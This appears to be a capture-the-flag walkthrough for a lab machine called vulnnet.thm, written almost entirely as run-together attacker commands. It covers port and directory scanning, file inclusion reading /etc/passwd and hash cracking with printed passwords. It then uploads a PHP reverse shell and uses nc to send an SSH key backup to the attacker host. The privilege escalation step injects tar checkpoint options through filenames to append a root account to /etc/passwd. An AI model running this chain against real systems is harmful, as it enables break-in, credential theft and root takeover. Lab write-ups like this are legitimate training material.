nmap -A $VICTIM
Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster dir -u vulnnet.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtnikto -h vulnnet.thmgobuster vhost -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://vulnnet.thm curl -s http://vulnnet.thm/?referer=/etc/passwd curl -s http://vulnnet.thm/?referer=/etc/passwd john --wordlist=/usr/share/wordlists/rockyou.txt hash.txtUsername: developers
Password: 9972761drmfslsgobuster -U developers -P 9972761drmfsls dir -u broadcast.vulnnet.thm -w /usr/share/wordlists/SecLists/Discovery/Web-C
ontent/directory-list-2.3-medium.txt -x php,html,txtnc -lvnp 1234git clone https://github.com/pentestmonkey/php-reverse-shell.git
cd php-reverse-shell/
curl -F "file=@php-reverse-shell.php" -F "plupload=1" -F "name=php-reverse-shell.php" http://broadcast.vulnnet.thm/actions/photo_uploader.php -u developers:9972761drmfslspython3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgcd /var/backups/
ls -lahnc -l -p 1234 > ssh-backup.tar.gznc -w 3 $KALI 1234 < ssh-backup.tar.gztar xvf ssh-backup.tar.gz /opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txtssh -i id_rsa server-management@$VICTIM
Password: oneTWO3gOyaccd /var/opt/
cat backupsrv.sh
ls -lah backupsrv.shcat /etc/crontabcd /home/server-management/Documents
rm -rf 'Employee Search Progress Report.pdf'
rm -rf 'Daily Job Progress Report Format.pdf'
touch ./--checkpoint=1
touch './--checkpoint-action=exec=sh shell.sh'
vi shell.sh#!/bin/bash
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwdchmod +x shell.shsu new
Password: 123